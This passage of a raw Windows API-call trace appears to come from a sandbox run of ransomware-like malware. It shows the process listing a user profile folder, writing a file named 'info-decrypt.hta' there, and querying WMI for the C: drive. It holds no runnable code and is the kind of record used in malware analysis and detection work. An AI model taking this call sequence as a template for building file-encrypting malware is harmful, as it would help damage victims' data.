lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda2814e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda2814e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0151.500] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0151.500] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0151.500] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0151.501] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0151.501] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0151.501] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0151.501] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0151.501] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0151.501] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0151.502] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda9cb840, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda9cb840, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0151.502] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0151.502] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0151.502] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0151.502] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0151.502] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0151.502] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0151.503] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0151.503] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xda9332c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xda9332c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0151.503] FindNextFileW (in: hFindFile=0x77b2f0, lpFindFileData=0x71ef0c4 | out: lpFindFileData=0x71ef0c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.503] FindClose (in: hFindFile=0x77b2f0 | out: hFindFile=0x77b2f0) returned 1 [0151.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef34c) returned 1 [0151.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef358) returned 1 [0151.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpFilePart=0x0) returned 0x28 [0151.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x71eee44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpFilePart=0x0) returned 0x28 [0151.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0151.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef2ac) returned 1 [0151.503] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x71ef328 | out: lpFileInformation=0x71ef328*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2a8) returned 1 [0151.504] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x71eee44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpFilePart=0x0) returned 0x28 [0151.504] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eecec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0151.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1e0) returned 1 [0151.504] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x584 [0151.504] GetFileType (hFile=0x584) returned 0x1 [0151.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef1dc) returned 1 [0151.504] GetFileType (hFile=0x584) returned 0x1 [0151.505] WriteFile (in: hFile=0x584, lpBuffer=0x3604cf8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x71ef2a4, lpOverlapped=0x0 | out: lpBuffer=0x3604cf8*, lpNumberOfBytesWritten=0x71ef2a4*=0x1000, lpOverlapped=0x0) returned 1 [0151.506] WriteFile (in: hFile=0x584, lpBuffer=0x3604cf8*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x71ef278, lpOverlapped=0x0 | out: lpBuffer=0x3604cf8*, lpNumberOfBytesWritten=0x71ef278*=0x557, lpOverlapped=0x0) returned 1 [0151.506] CloseHandle (hObject=0x584) returned 1 [0151.506] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x71eedc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpFilePart=0x0) returned 0x28 [0151.506] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef274) returned 1 [0151.506] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), fInfoLevelId=0x0, lpFileInformation=0x3605d14 | out: lpFileInformation=0x3605d14*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0151.507] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef270) returned 1 [0151.507] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", nBufferLength=0x105, lpBuffer=0x71eecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT", lpFilePart=0x0) returned 0x28 [0151.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1a8) returned 1 [0151.507] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0151.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71edfe0) returned 1 [0151.508] CoTaskMemAlloc (cb=0x20c) returned 0x6f2e948 [0151.508] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6f2e948 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0151.508] CoTaskMemFree (pv=0x6f2e948) [0151.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x71eec88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.509] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef1d0 | out: ppv=0x71ef1d0*=0x72015c) returned 0x0 [0151.509] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef1c8 | out: pAptType=0x71ef1c8*=1) returned 0x0 [0151.509] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef1cc | out: ppvObject=0x71ef1cc*=0x0) returned 0x80004002 [0151.509] IUnknown:Release (This=0x72015c) returned 0x1 [0151.510] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eeb38 | out: ppv=0x71eeb38*=0x6736e68) returned 0x0 [0151.510] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e68, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eed50 | out: ppvObject=0x71eed50*=0x0) returned 0x80004002 [0151.510] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e68, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed64 | out: ppvObject=0x71eed64*=0x6738770) returned 0x0 [0151.510] WbemDefPath:IUnknown:Release (This=0x6736e68) returned 0x0 [0151.510] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee984 | out: ppvObject=0x71ee984*=0x6738770) returned 0x0 [0151.510] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee940 | out: ppvObject=0x71ee940*=0x0) returned 0x80004002 [0151.510] WbemDefPath:IUnknown:AddRef (This=0x6738770) returned 0x3 [0151.510] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee29c | out: ppvObject=0x71ee29c*=0x0) returned 0x80004002 [0151.510] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee24c | out: ppvObject=0x71ee24c*=0x0) returned 0x80004002 [0151.511] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee258 | out: ppvObject=0x71ee258*=0x77be38) returned 0x0 [0151.511] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77be38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee260 | out: pCid=0x71ee260*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0151.511] WbemDefPath:IUnknown:Release (This=0x77be38) returned 0x3 [0151.511] CoGetContextToken (in: pToken=0x71ee2b8 | out: pToken=0x71ee2b8) returned 0x0 [0151.511] CoGetContextToken (in: pToken=0x71ee6c0 | out: pToken=0x71ee6c0) returned 0x0 [0151.511] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee750 | out: ppvObject=0x71ee750*=0x0) returned 0x80004002 [0151.511] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x2 [0151.511] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x1 [0151.511] CoGetContextToken (in: pToken=0x71ef048 | out: pToken=0x71ef048) returned 0x0 [0151.511] CoGetContextToken (in: pToken=0x71eefa8 | out: pToken=0x71eefa8) returned 0x0 [0151.511] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738770, riid=0x71ef078*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71ef074 | out: ppvObject=0x71ef074*=0x6738770) returned 0x0 [0151.511] WbemDefPath:IUnknown:AddRef (This=0x6738770) returned 0x3 [0151.511] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x2 [0151.511] WbemDefPath:IWbemPath:SetText (This=0x6738770, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0151.511] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738770, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0151.511] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=2, puBuffLength=0x71ef1f8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f8*=0x20, pszText=0x0) returned 0x0 [0151.511] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=2, puBuffLength=0x71ef1f8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0151.511] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738770, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0151.511] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738770, puCount=0x71ef1fc | out: puCount=0x71ef1fc*=0x0) returned 0x0 [0151.511] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738770, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0151.511] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738770, uRequestedInfo=0x0, puResponse=0x71ef204 | out: puResponse=0x71ef204*=0xc19) returned 0x0 [0151.511] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738770, puCount=0x71ef17c | out: puCount=0x71ef17c*=0x0) returned 0x0 [0151.511] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x71ef168 | out: puCount=0x71ef168*=0x2) returned 0x0 [0151.512] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0x0, pszText=0x0 | out: puBuffLength=0x71ef164*=0xf, pszText=0x0) returned 0x0 [0151.512] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71ef164*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef164*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.512] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef118 | out: ppv=0x71ef118*=0x72015c) returned 0x0 [0151.512] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef110 | out: pAptType=0x71ef110*=1) returned 0x0 [0151.512] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef114 | out: ppvObject=0x71ef114*=0x0) returned 0x80004002 [0151.512] IUnknown:Release (This=0x72015c) returned 0x1 [0151.513] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, 